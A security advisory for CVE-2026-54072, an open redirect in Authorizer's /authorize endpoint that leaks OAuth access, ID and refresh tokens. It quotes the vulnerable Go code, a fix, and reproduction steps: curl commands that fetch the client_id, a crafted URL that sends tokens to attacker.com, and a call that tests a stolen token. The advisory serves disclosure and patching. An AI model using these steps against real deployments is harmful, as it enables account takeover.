PT-2026-57366 · Go · Github.Com/Authorizerdev/Authorizer
Published
2026-07-10
·
Updated
2026-07-10
·
CVE-2026-54072
CVSS v3.1
9.3
Critical
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N |
Summary
The
/authorize endpoint accepts any redirect uri without validating it against AllowedOrigins. When response type=token or response type=id token, the server appends access token, id token, and refresh token as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required client id from the public /graphql?query={meta{client id}} endpoint.Partial fix was applied in v2.0.1 to other handlers (
oauth login, verify email, magic link login, forgot password, invite members, oauth callback) but /authorize was not included.Vulnerable Code
internal/http handlers/authorize.go:go
redirectURI := strings.TrimSpace(gc.Query("redirect uri"))
// ... no IsValidOrigin() call ...
// response type=token path (line ~263):
if strings.Contains(redirectURI, "?") {
redirectURI = redirectURI + "&" + params
} else {
redirectURI = redirectURI + "?" + params
}
handleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URLCompare with the fixed
oauth login.go in v2.0.1 which calls validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins).Steps to Reproduce
bash
# 1. Obtain client id (no authentication required)
CLIENT ID=$(curl -s http://TARGET/graphql
-H "Content-Type: application/json"
-d '{"query":"{meta{client id}}"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['meta']['client id'])")
echo "client id: $CLIENT ID"
# 2. Craft the malicious URL and send to victim (victim must be logged in)
# When victim opens this URL, tokens are delivered to attacker.com
MALICIOUS URL="http://TARGET/authorize?response type=token&client id=${CLIENT ID}&redirect uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response mode=query"
echo "Send to victim: $MALICIOUS URL"
# 3. Attacker receives 302 redirect with all tokens:
# https://attacker.com/steal?access token=eyJ...&token type=bearer&expires in=...&id token=eyJ...
# 4. Validate stolen token
curl -s http://TARGET/userinfo
-H "Authorization: Bearer STOLEN ACCESS TOKEN"
# Returns: {"email":"victim@example.com","id":"...","roles":["user"]}Impact
An attacker who tricks a logged-in user into clicking a crafted link can steal the victim's
access token, id token, and refresh token. The attacker can then impersonate the victim for the full token lifetime. No user interaction beyond clicking the link is required; the victim's browser issues the redirect automatically.Proposed Fix
Add the same
IsValidOrigin check that was applied to the other handlers in v2.0.1:go
// In authorize.go, after reading redirect uri:
if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {
handleResponse(gc, responseMode, authURL, redirectURI, map[string]interface{}{
"error": "invalid request",
"error description": "redirect uri is not allowed",
}, http.StatusBadRequest)
return
}Fix
Open Redirect
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Github.Com/Authorizerdev/Authorizer